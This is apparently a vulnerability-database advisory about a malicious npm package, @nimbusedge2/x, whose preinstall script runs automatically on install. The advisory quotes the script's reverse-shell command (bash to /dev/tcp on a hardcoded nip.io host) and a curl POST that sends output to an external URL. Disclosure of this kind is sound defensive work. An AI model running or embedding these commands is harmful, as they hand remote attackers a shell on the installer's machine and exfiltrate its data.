VDB
GCVE-110-OSM-2026-12433
GCVE-110-OSM-2026-12433
Advisory PublishedCVSS 8.8/10
package.json declares a preinstall lifecycle script that runs automatically on `npm install`. The script invokes `bash -i >& /dev/tcp/147.93.157.202.nip.io/8080` to open an interactive reverse shell to a hardcoded IP-based host (147.93.157.202 via nip.io) on port 8080, and pipes activity through `curl -s -m 5 -X POST --data-binary @- http://canarytokens.com/terms/7dc94zmd3so67n5vbz5bxmt7v/contact.php`, an install-time cleartext-HTTP beacon to an external endpoint. The reverse shell grants the remote endpoint interactive command execution on the installer's host at install time; the paired POST exfiltrates output to a hardcoded external URL. No legitimate functionality is shipped alongside these actions.
ENTRY
- Preinstall Script in package.json: ""preinstall": "bash -i >& /dev/tcp/147.93.157.202.nip.io/8080 0>&1 | curl -s -m ..."
DESTINATION
- 2 fetched-payload (ipv4, domains)
(values recorded in verified_iocs)
ADDITIONAL FINDINGS
- Brand New Package
- Very New NPM Publisher Account
- Publisher Shows Burner-Account Pattern
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
8.8/10
High · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | @nimbusedge2/x | all (affected) | — |
Aliases
Browse GCVE Records
400 records in the GCVE database · Updated September 21, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.